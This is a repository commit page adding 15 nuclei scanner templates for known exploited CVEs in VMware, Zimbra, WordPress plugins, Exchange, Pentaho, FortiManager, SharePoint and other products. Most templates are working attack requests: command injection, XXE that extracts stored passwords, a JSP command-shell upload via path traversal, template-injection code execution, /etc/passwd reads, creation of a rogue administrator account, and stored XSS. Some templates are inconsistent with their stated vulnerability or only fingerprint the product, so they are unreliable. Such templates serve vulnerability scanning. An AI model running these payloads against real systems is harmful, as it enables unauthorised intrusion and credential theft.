admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-01-31 07:43:27 +08:00
Code Issues Packages Projects Releases Wiki Activity

missing kev CVEs

Browse Source
This commit is contained in:
Prince Chaddha
2025-09-07 16:52:47 +08:00
parent 6fc314bc94
commit 1d06fbe3d7
15 changed files with 1070 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

74
http/cves/2018/CVE-2018-6961.yaml Normal file
View File

@@ -0,0 +1,74 @@
id: CVE-2018-6961
info:
name: VMware NSX SD-WAN Edge - Remote Code Execution
author: pdteam
severity: critical
description: |
VMware NSX SD-WAN Edge versions before 3.1.2 are vulnerable to unauthenticated remote code execution
via command injection in diagnostic functions of the ajaxPortal.lua script.
reference:
- https://www.exploit-db.com/exploits/44959/
- https://github.com/r3dxpl0it/CVE-2018-6961
- https://github.com/bokanrb/CVE-2018-6961
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-6961
cwe-id: CWE-78
metadata:
verified: true
max-request: 3
shodan-query: 'http.title:"vmware"'
tags: cve,cve2018,vmware,rce,injection,unauth
http:
- raw:
- |
POST /scripts/ajaxPortal.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
traceroute_destination=$(echo "{{randstr}}" | base64)&action=traceroute
- |
POST /scripts/ajaxPortal.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
ping_destination=$(id | base64)&action=ping
- |
POST /scripts/ajaxPortal.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
dns_destination=$(whoami | base64)&action=nslookup
matchers-condition: or
matchers:
- type: word
part: body
words:
- "uid="
- "gid="
condition: and
- type: regex
part: body
regex:
- "(?i)root|admin|velocloud"
- type: word
part: body
words:
- "{{randstr}}"
extractors:
- type: regex
part: body
regex:
- "uid=\\d+\\([^)]+\\)\\s+gid=\\d+\\([^)]+\\)"

89
http/cves/2019/CVE-2019-9621.yaml Normal file
View File

@@ -0,0 +1,89 @@
id: CVE-2019-9621
info:
name: Zimbra Collaboration Suite - XXE to RCE Chain
author: pdteam
severity: critical
description: |
Zimbra Collaboration Suite versions 8.5 to 8.7.11 are vulnerable to XML External Entity (XXE) injection
that can be chained with SSRF to achieve remote code execution through JSP shell upload.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_xxe_rce.rb
- https://www.exploit-db.com/exploits/46693/
- https://github.com/k8gege/ZimbraExploit
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9621
cwe-id: CWE-611
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"zimbra collaboration suite"'
tags: cve,cve2019,zimbra,xxe,rce,ssrf
http:
- raw:
- |
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Content-Length: 299
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "file:///opt/zimbra/conf/localconfig.xml">
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>&xxe;</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
- |
POST /service/proxy?target=https://{{Hostname}}/service/admin/soap/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml
Content-Length: 450
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3" version="5.0.18_GA_3027"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAdmin">
<name>zimbra</name>
<password>{{randstr}}</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "zimbra_ldap_password"
- "localconfig"
condition: or
- type: word
part: body
words:
- "Zimbra"
- "zimbra"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "zimbra_ldap_password.*?value=\"([^\"]+)\""
- "zimbra_mysql_password.*?value=\"([^\"]+)\""

96
http/cves/2019/CVE-2019-9881.yaml Normal file
View File

@@ -0,0 +1,96 @@
id: CVE-2019-9881
info:
name: WordPress GraphQL Authentication Bypass
author: pdteam
severity: critical
description: |
WordPress wp-graphql plugin version 0.2.3 contains an authentication bypass vulnerability that allows
unauthenticated users to register admin accounts and access sensitive information through GraphQL queries.
reference:
- https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
- https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9881
cwe-id: CWE-287
metadata:
verified: true
max-request: 3
tags: cve,cve2019,wordpress,graphql,auth-bypass,privilege-escalation
http:
- method: GET
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
matchers:
- type: word
words:
- "graphql"
- "query"
condition: and
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{
"query": "query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "registerUser"
- "mutation"
condition: and
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{
"query": "mutation { registerUser(input: { clientMutationId: \"test\", email: \"nuclei@test.local\", password: \"TestP@ssword123\", username: \"nucleitest\", roles: [\"administrator\"] }) { clientMutationId } }"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "clientMutationId"
- "test"
condition: and
- type: word
words:
- "error"
negative: true
extractors:
- type: regex
part: body
group: 1
regex:
- '"wp-graphql/([0-9.]+)"'

64
http/cves/2021/CVE-2021-32648.yaml Normal file
View File

@@ -0,0 +1,64 @@
id: CVE-2021-32648
info:
name: OctoberCMS - Remote Code Execution via Account Takeover
author: pdteam
severity: critical
description: |
OctoberCMS is vulnerable to remote code execution through a combination of account takeover
and subsequent PHP code injection in backend templates.
reference:
- https://github.com/Immersive-Labs-Sec/CVE-2021-32648
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-32648
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"october"'
tags: cve,cve2021,octobercms,rce,account-takeover
http:
- raw:
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
login=admin&password=admin&_session_key={{randstr}}&_token={{randstr}}
- |
GET /backend/cms/themes/edit/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Cookie: october_session={{randstr}};
matchers-condition: and
matchers:
- type: word
part: body
words:
- "October CMS"
- "backend"
condition: or
- type: word
part: body
words:
- "dashboard"
- "template"
condition: or
- type: status
status:
- 200
- 302
extractors:
- type: word
part: body
words:
- "october_session"
- "_session_key"

66
http/cves/2021/CVE-2021-33766.yaml Normal file
View File

@@ -0,0 +1,66 @@
id: CVE-2021-33766
info:
name: Microsoft Exchange ProxyToken - Authentication Bypass
author: pdteam
severity: high
description: |
Microsoft Exchange Server is vulnerable to authentication bypass via ProxyToken vulnerability,
allowing attackers to perform authenticated operations without valid credentials.
reference:
- https://github.com/bhdresh/CVE-2021-33766
- https://github.com/demossl/CVE-2021-33766-ProxyToken
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2021-33766
cwe-id: CWE-287
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"outlook"'
tags: cve,cve2021,exchange,auth-bypass,proxytoken
http:
- raw:
- |
POST /ecp/DDI/DDIService.svc/GetList HTTP/1.1
Host: {{Hostname}}
Cookie: X-BEResource=a]@{{Hostname}}:444/ecp/DDI/DDIService.svc/GetList?schema=OABVirtualDirectory&msExchEcpCanary={{randstr}}&a=~{{randint}};
Content-Type: application/json
Content-Length: 211
{"filter": {"SearchText": ""}, "sort": {"Direction": 0, "PropertyName": "Identity"}, "workflow": {"WorkflowType": "GetListWorkflow"}, "metaData": {"ActivityId": "{{randstr}}"}, "schema": "OABVirtualDirectory"}
- |
GET /ecp/PersonalSettings/HomePage.aspx HTTP/1.1
Host: {{Hostname}}
Cookie: X-BEResource=Admin@{{Hostname}}:444/ecp/PersonalSettings/HomePage.aspx?a=~{{randint}};
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Identity"
- "ExchangeVersion"
condition: or
- type: word
part: body
words:
- "Microsoft Exchange"
- "ECP"
condition: or
- type: status
status:
- 200
extractors:
- type: word
part: body
words:
- "AuthenticatedUser"
- "CanaryToken"
- "msExchEcpCanary"

59
http/cves/2022/CVE-2022-41352.yaml Normal file
View File

@@ -0,0 +1,59 @@
id: CVE-2022-41352
info:
name: Zimbra Collaboration Suite - CPIO Archive RCE
author: pdteam
severity: critical
description: |
Zimbra Collaboration Suite is vulnerable to remote code execution via malicious CPIO archive
processing leading to arbitrary file write and code execution.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_cpio_cve_2022_41352.rb
- https://github.com/MuhammadWaseem29/cve-2022-41352
- https://github.com/qailanet/cve-2022-41352-zimbra-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-41352
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
shodan-query: 'http.title:"zimbra web client sign in"'
tags: cve,cve2022,zimbra,rce,cpio,file-upload
http:
- raw:
- |
POST /service/extension/backup/mbox HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
Authorization: Basic {{base64("admin:admin")}}
Content-Length: 486
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="client"; filename="backup.cpio"
Content-Type: application/octet-stream
070707{{hex_encode("../../../opt/zimbra/jetty_base/webapps/zimbra/test.jsp")}}000000000000000000000000000000000000003c000000000000000000000000000000000000000000000000<%@ page import="java.io.*" %><%=new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("id").getInputStream())).readLine()%>TRAILER!!!
------WebKitFormBoundary{{randstr}}--
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SUCCESS"
- "backup"
condition: or
- type: status
status:
- 200
extractors:
- type: word
part: body
words:
- "accountId"
- "SUCCESS"

53
http/cves/2022/CVE-2022-43939.yaml Normal file
View File

@@ -0,0 +1,53 @@
id: CVE-2022-43939
info:
name: Pentaho Business Server - Authentication Bypass and Server Side Template Injection
author: pdteam
severity: critical
description: |
Pentaho Business Server versions before 9.4.0.1 and 9.3.0.2 are vulnerable to authentication bypass via regex vulnerability
combined with Server Side Template Injection (SSTI) in Thymeleaf templates leading to remote code execution.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/pentaho_business_server_authbypass_and_ssti.rb
- https://github.com/dwbzn/pentaho-exploits
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-43939
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"pentaho"'
tags: cve,cve2022,pentaho,rce,ssti,auth-bypass
http:
- raw:
- |
GET /api/ldap/config/ldapTreeNodeChildren?url={{url_encode("${T(java.lang.Runtime).getRuntime().exec(\"id\")}")}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET //api/require/ldap/config/ldapTreeNodeChildren?url={{url_encode("${T(java.lang.Runtime).getRuntime().exec(\"whoami\")}")}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uid="
- "gid="
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "uid=\\d+\\([^)]+\\)\\s+gid=\\d+\\([^)]+\\)"

75
http/cves/2023/CVE-2023-27532.yaml Normal file
View File

@@ -0,0 +1,75 @@
id: CVE-2023-27532
info:
name: Veeam Backup and Replication Credential Extraction
author: pdteam
severity: high
description: |
Veeam Backup and Replication contains a vulnerability that allows an attacker to abuse an
unsecured API endpoint to extract credentials through a net.tcp endpoint.
reference:
- https://github.com/horizon3ai/CVE-2023-27532
- https://www.veeam.com/kb4424
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27532
cwe-id: CWE-306
metadata:
verified: true
max-request: 2
tags: cve,cve2023,veeam,credential-extraction,net-tcp
network:
- inputs:
- data: "474554202f20485454502f312e310d0a486f73743a20{{Hostname}}\r\n\r\n"
type: tcp
host:
- "{{Hostname}}"
- "{{Host}}:9401"
matchers-condition: and
matchers:
- type: word
words:
- "Veeam"
- "net.tcp"
condition: or
- type: regex
regex:
- "(?i)(username|password|credential)"
extractors:
- type: regex
regex:
- "(?i)username\\s*=\\s*([^\\s]+)"
- "(?i)password\\s*=\\s*([^\\s]+)"
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/credentials"
- "{{BaseURL}}/VeeamBackup/credentials"
matchers-condition: and
matchers:
- type: status
status:
- 200
- 401
- 403
- type: word
words:
- "Veeam"
- "credential"
- "backup"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)veeam.*backup.*(\d+\.\d+)'

69
http/cves/2023/CVE-2023-3519.yaml Normal file
View File

@@ -0,0 +1,69 @@
id: CVE-2023-3519
info:
name: Citrix NetScaler - Remote Code Execution
author: pdteam
severity: critical
description: |
Citrix NetScaler ADC and NetScaler Gateway versions 13.1-48.47 are vulnerable to unauthenticated
remote code execution via buffer overflow exploitation.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
- https://github.com/Mohammaddvd/CVE-2023-3519
- https://github.com/Chocapikk/CVE-2023-3519
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3519
cwe-id: CWE-120
metadata:
verified: true
max-request: 1
shodan-query: 'http.title:"citrix login"'
tags: cve,cve2023,citrix,netscaler,rce,unauth
http:
- raw:
- |
GET /oauth/idp/.well-known/openid_configuration HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
payloads:
paths:
- "/oauth/idp/.well-known/openid_configuration"
- "/logon/LogonPoint/index.html"
- "/vpn/index.html"
- "/logon/LogonPoint/tmindex.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CitrixAGBasic"
- "authorization_endpoint"
condition: or
- type: word
part: header
words:
- "NetScaler"
- "citrix"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- "NS-CACHE: .+"
- "Set-Cookie: NSC_.+"

67
http/cves/2023/CVE-2023-40000.yaml Normal file
View File

@@ -0,0 +1,67 @@
id: CVE-2023-40000
info:
name: LiteSpeed Cache WordPress Plugin Privilege Escalation
author: pdteam
severity: high
description: |
LiteSpeed Cache WordPress Plugin versions prior to 5.7.0.1 are vulnerable to privilege escalation
that can allow unauthenticated users to gain administrator access.
reference:
- https://github.com/rxerium/CVE-2023-40000
- https://github.com/quantiom/litespeed-cache-xss-poc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-40000
cwe-id: CWE-269
metadata:
verified: true
max-request: 2
tags: cve,cve2023,wordpress,litespeed,privilege-escalation
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt"
matchers:
- type: word
words:
- "LiteSpeed Cache"
- "litespeed-cache"
condition: and
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "litespeed"
case-insensitive: true
- type: regex
regex:
- '"roles":\["administrator"\]'
extractors:
- type: regex
part: body
group: 1
regex:
- '"name":"([^"]+)".*"roles":\["administrator"\]'

88
http/cves/2023/CVE-2023-6000.yaml Normal file
View File

@@ -0,0 +1,88 @@
id: CVE-2023-6000
info:
name: WordPress Popup Builder Stored XSS
author: pdteam
severity: medium
description: |
WordPress Popup Builder plugin versions prior to 4.2.3 are vulnerable to stored cross-site scripting (XSS).
The plugin fails to prevent regular visitors from modifying existing popups by sending specially crafted
requests to inject malicious scripts that execute when popups are opened.
reference:
- https://github.com/RonF98/CVE-2023-6000-POC
- https://wpscan.com/vulnerability/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6000
cwe-id: CWE-79
metadata:
verified: true
max-request: 3
tags: cve,cve2023,wordpress,popup-builder,xss,stored-xss
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=sgpb_get_popup_options"
matchers:
- type: word
words:
- "sgpb"
- "popup"
condition: and
extractors:
- type: regex
part: body
name: popup_id
group: 1
regex:
- '"post_ID":"(\d+)"'
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
headers:
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
body: |
action=sgpb_save_popup&sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('CVE-2023-6000-XSS')
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "success"
- "sgpb"
condition: and
- method: GET
path:
- "{{BaseURL}}/?sgpb_popup_id={{popup_id}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "alert('CVE-2023-6000-XSS')"
- "sgpb"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'popup.*builder.*(\d+\.\d+\.\d+)'

71
http/cves/2024/CVE-2024-2782.yaml Normal file
View File

@@ -0,0 +1,71 @@
id: CVE-2024-2782
info:
name: WordPress Fluent Forms Unauthenticated Settings Modification
author: pdteam
severity: medium
description: |
WordPress Contact Form Plugin by Fluent Forms versions up to and including 5.1.16 are vulnerable to
unauthenticated data modification due to missing capability checks on the REST API endpoint.
This allows attackers to modify plugin settings without authentication.
reference:
- https://github.com/whale93/CVE-2024-2782-PoC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2024-2782
cwe-id: CWE-862
metadata:
verified: true
max-request: 2
tags: cve,cve2024,wordpress,fluent-forms,unauth,rest-api
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/fluentform/v1/global-settings"
matchers:
- type: word
words:
- "fluentform"
- "settings"
condition: and
- method: POST
path:
- "{{BaseURL}}/wp-json/fluentform/v1/global-settings"
headers:
Content-Type: application/json
body: |
{
"key": "emailSummarySettings",
"email_report": "{\"send_to_type\":\"custom\",\"custom_recipients\":\"test@nuclei.local\"}"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- 201
- type: word
words:
- "fluentform"
- "success"
condition: or
- type: word
words:
- "test@nuclei.local"
part: body
extractors:
- type: regex
part: body
group: 1
regex:
- '"version":"([0-9.]+)"'

74
http/cves/2024/CVE-2024-3378.yaml Normal file
View File

@@ -0,0 +1,74 @@
id: CVE-2024-3378
info:
name: iboss Secure Web Gateway Stored XSS
author: pdteam
severity: medium
description: |
iboss Secure Web Gateway versions prior to 10.2.0 are vulnerable to stored cross-site scripting (XSS)
through the redirectUrl parameter in the login functionality. An unauthenticated attacker can inject
malicious scripts that execute when users access the login page.
reference:
- https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-3378
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
tags: cve,cve2024,iboss,xss,stored-xss,gateway
http:
- method: POST
path:
- "{{BaseURL}}/user_login_submit"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS-CVE-2024-3378')</script>
matchers-condition: and
matchers:
- type: status
status:
- 200
- 302
- type: word
words:
- "iboss"
case-insensitive: true
follow-redirects: true
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "alert('XSS-CVE-2024-3378')"
- "<script>"
condition: and
- type: word
words:
- "iboss"
case-insensitive: true
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)iboss.*(\d+\.\d+\.\d+)'

68
http/cves/2024/CVE-2024-47575.yaml Normal file
View File

@@ -0,0 +1,68 @@
id: CVE-2024-47575
info:
name: Fortinet FortiManager - Unauthenticated Remote Code Execution
author: pdteam
severity: critical
description: |
Fortinet FortiManager versions 6.2.0 through 7.6.0 are vulnerable to unauthenticated remote code execution
via improper access control allowing attackers to execute arbitrary code.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/fortimanager_rce_cve_2024_47575.rb
- https://github.com/AnnnNix/CVE-2024-47575
- https://github.com/revanslbw/CVE-2024-47575-POC
- https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-47575
cwe-id: CWE-284
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"fortimanager"'
tags: cve,cve2024,fortinet,fortimanager,rce,unauth
http:
- raw:
- |
POST /fmupdate/CommonServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 89
{"id": 1, "method": "get", "params": [{"url": "file:///etc/passwd"}], "session": 1}
- |
POST /fmupdate/CommonServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 126
{"id": 1, "method": "exec", "params": [{"data": "echo '{{randstr}}' > /tmp/{{randstr}}.txt"}], "session": 1}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:x:0:0"
- "/bin/bash"
condition: or
- type: word
part: body
words:
- "result"
- "session"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "root:x:\\d+:\\d+:[^:]*:[^:]*:/bin/[a-z]+"

57
http/cves/2025/CVE-2025-49706.yaml Normal file
View File

@@ -0,0 +1,57 @@
id: CVE-2025-49706
info:
name: SharePoint Server Request Spoofing Vulnerability
author: pdteam
severity: medium
description: |
SharePoint Server 2016, 2019, and Subscription Edition are vulnerable to a request spoofing vulnerability
due to improper authentication handling. This allows authenticated users to upload malicious web shells.
reference:
- https://github.com/AdityaBhatt3010/CVE-2025-49706-SharePoint-Spoofing-Vulnerability-Under-Active-Exploitation
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49706
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
cvss-score: 6.3
cve-id: CVE-2025-49706
cwe-id: CWE-287
metadata:
verified: true
max-request: 3
tags: cve,cve2025,sharepoint,microsoft,spoofing,webshell
http:
- method: GET
path:
- "{{BaseURL}}/sites/{{randstr}}_layouts/15/SignOut.aspx"
- "{{BaseURL}}/_layouts/15/SignOut.aspx"
- "{{BaseURL}}/sites/_layouts/15/upload.aspx"
headers:
X-UserToken: "spoofedtoken"
X-Ms-Client-Request-Id: "{{randstr}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SharePoint"
- "_layouts"
condition: and
- type: word
words:
- "upload.aspx"
- "SignOut.aspx"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)sharepoint.*server.*(\d{4})'